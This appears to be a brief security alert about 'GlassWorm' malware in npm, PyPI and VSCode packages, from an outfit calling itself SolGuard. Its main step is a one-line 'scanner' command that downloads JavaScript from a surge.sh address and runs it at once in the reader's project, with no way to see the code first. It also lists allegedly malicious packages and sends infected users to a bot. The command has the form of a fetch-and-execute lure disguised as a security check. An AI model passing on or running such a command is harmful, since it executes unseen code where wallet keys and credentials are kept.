GlassWorm Hit 400+ Repos — Free 10-Second Scanner for Your npm Project
SolGuard SecurityGlassWorm malware has compromised 400+ repositories on npm, PyPI, and VSCode extensions (BleepingComputer, April 2026). It uses Solana wallets as C2 dead drops via memo transactions.
Free project scanner — no install needed
node -e "$(curl -s https://solguard-security-monitor.surge.sh/scan.js)"
Run this in your project directory. Checks: package.json, lock files, postinstall scripts, source code, VSCode extensions. No data leaves your machine.
What GlassWorm steals
- Solana private keys from ~/.config/solana/id.json
- Environment variables including API keys
- Sends exfil via Solana memo program (the C2 dead drop mechanism)
Known malicious packages (partial list)
- solana-wallets-connector, sol-wallet-utils, solana-pay-sdk
- raydium-sdk-v2-patch, orca-whirlpool-utils, jupiter-aggregator-fix
- anchor-lang-utils, spl-governance-tools, metaplex-nft-sdk
If infected
- Stop the process immediately
- Rotate all credentials and Solana keypairs
- Check wallet for unauthorized transactions via @SolGuard_Bot